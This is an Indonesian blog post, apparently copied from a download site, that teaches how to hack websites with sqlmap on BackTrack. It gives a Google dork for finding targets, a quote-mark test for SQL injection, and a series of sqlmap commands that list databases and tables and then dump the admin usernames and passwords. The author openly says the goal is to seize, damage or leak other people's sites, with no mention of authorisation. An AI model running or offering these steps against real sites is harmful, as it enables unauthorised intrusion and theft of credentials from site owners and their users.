Bagi para hacker, cracker, cyber maupun anonymous. Hal ini tentu saja sudah sangat familiar dikalangan mereka, bahkan sudah menjadi makanan sehari-hari. Ada banyak cara untuk membobol maupun hack dari sebuah website.. nah kali ini kami akan sedikit sharing mengenai cara hack website menggunakan sql map.
Dengan mengetahui password maupun username dari sebuah website, kita tentunya akan dengan leluasanya mengendalikan website target tersebut.. kita dapat mengambil, menyebarkan, merusak, maupun mengambil alih kendali.

OS yang banyak digunakan para cyber, maupun hacker untuk membobol biasanya banyak menggunakan BackTrack, Kali Linux, dan lain-lain. yukk langsung ke TKP...

Langkah-langkah hack Website Menggunakan SQL Map dengan BackTracx 5 r3:
1. Cari Target Dengan Menggunakan Google Dork
untuk melihat lengkap kami sudah menyediakannya untuk pencarian menggunakan google dork, copy'kan code seperti

Code:

inurl:gallery.php?id=

tersebut ke google, namun kami sarankan untuk tidak ke new tab, namun langsung ke pencarian google.
Silahkan lihat cara-caranya disini:

• <a href="http://pastebin.com/SRbDdwQn" target="blank"><button>Google Dork</button></a>
  
• <a href="http://pastebin.com/wcVkQhKe" target="blank"><button>Backup Google Dork</button></a>
  

2. Cari Website yang Vuvln, karena tidak semua website itu vuvln. dalam hal ini, biasanya kita menggunakan cara untuk melihat ID dengan menggunakan google dork yang sudah dicari tadi, contohnya seperti ini:

Code:

 inurl:gallery.php?id=

Untuk mengecheck apakah website itu Vuvln atau tidak, kita sisipkan tanda petik ( " atau ' ) pada bagian akhir nomer id'nya.. Contohnya:

Code:

http://www.nama_web.org/gallery.php?id=1"

Jika terdapat error kurang lebih seperti gambar diatas, maka kemungkinan website tersebut vuvln.

3. Buka Console [ Terminal ]
Kemudian Ketikkan:

Code:

cd /pentest/database/sqlmap    [ Enter ]

Kemudian Ketikkan:

Code:

./sqlmap.py -u http://nama_website.org/gallery.php?id=1  --dbs

[ Tergantung yang dicari ], [ --dbs untuk melihat nama database'nya ]
Contohnya Seperti gambar dibawah ini:

4. Mecari table database'nya dengan perintah --tables atau --table
Gambar dibawah terdapat 2 nama database'nya, yaitu information_schema dan nubriorg_db.
Kemudian terserah kita mau melihat bagian yang mana, namun contoh dibawah kami membuka nama database yang bernama nubriorg_db.
Dengan mengedit bagian akhirnya menjadi seperti ini:

Code:

./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db --table

5. Mencari Kolom username dan password target.
Setelah kita mendapatkan nama dari database tadi. Kemudian kita pecah lagi pada bagian admin [ bagian vital'nya ] Dengan mengetikkan:

Code:

./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db -T admin --columns

6. Melihat nama dan password admin.
Setelah proses diatas dilalui, maka kita akan mendapatkan hasil seperti gambar dibawah ini. Kemudian kita lihat nama dan password dari admin tersebut dengan mengetikkan:

Code:

./sqlmap.py -u http://nama_website.net/gallery.php?id=1 -D nubriorg_db -T admin --dump

7. Waktunya Eksekusi.
Jika ada perintah untuk memilih Yes or No, Kita pilih: Y ,Seperti contoh dibawah ini. dan kemudian kita tunggu sampai proses'nya selesai.

8. Duarrrrr!!
Selesai sudah...dan kita dapat bebas mau diapain itu website.

Ane gak bertanggung jawab atas apa yang ente lakukan.  Resiko ditanggung penumpang. Ane hanya sekedar sharing ilmu mengenai hal ini. Harap gunakan ilmu ini dengan sebijak-bijak'nya.

Source: semua-tinggal-download.blogspot.com